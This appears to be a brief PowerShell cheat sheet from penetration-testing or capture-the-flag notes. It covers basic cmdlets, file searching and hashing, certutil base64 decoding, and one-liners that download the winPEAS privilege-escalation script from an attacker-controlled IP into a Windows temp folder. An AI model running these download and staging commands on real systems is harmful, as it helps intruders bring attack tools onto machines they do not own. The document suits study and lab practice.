Scripting

Powershell

Commonly used Powershell commands, tips and tricks.

The Basics

Get-Command

Gets all the cmdlets installed on the current Computer and allows for pattern matching with the following:

Get-Command Verb-* or Get-Command *-Noun

Find, read, and get hash of a file

Get-ChildItem -Path C:\ -Include *interesting-file.txt* -File -Recurse -ErrorAction SilentlyContinue
Get-Content "C:\Program Files\interesting-file.txt.txt"
Get-FileHash -Path "C:\Program Files\interesting-file.txt.txt" -Algorithm MD5
Get-Location is the same as "Print Working Directory"

Download File

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.6.57.139:8000/winPEAS.bat','winPEAS.bat')"
powershell -c "Invoke-WebRequest -Uri 'http://10.6.57.139:80/winPEAS.bat' -OutFile 'C:\Windows\Temp\winpeas.bat'"

Decode Text

Get-ChildItem -Path C:/ -Include b64.txt -Recurse -File
certutil -decode "C:\Users\Administrator\Desktop\b64.txt" decode.txt
Get-Content .\decode.txt

Passive Reconnaissance

Gathering information about a target system or network without directly interacting with it

HTA

An HTML Application (HTA) is a Microsoft Windows program that combines HTML, Dynamic HTML, and scripting languages supported by Internet Explorer, such as VBScript or JScript, to create a desktop application-like interface